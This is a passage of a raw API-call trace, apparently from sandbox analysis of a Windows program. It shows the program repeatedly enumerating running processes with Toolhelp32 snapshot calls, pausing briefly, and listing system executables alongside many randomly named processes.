th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.968] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.969] CloseHandle (hObject=0xc4) returned 1 [0104.969] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0104.974] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.029] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.029] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.030] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.031] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.032] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.033] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.035] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.036] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.037] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.038] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.039] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.040] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.043] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0105.066] CloseHandle (hObject=0xbc) returned 1 [0105.066] Sleep (dwMilliseconds=0x12c) [0105.371] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0105.376] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 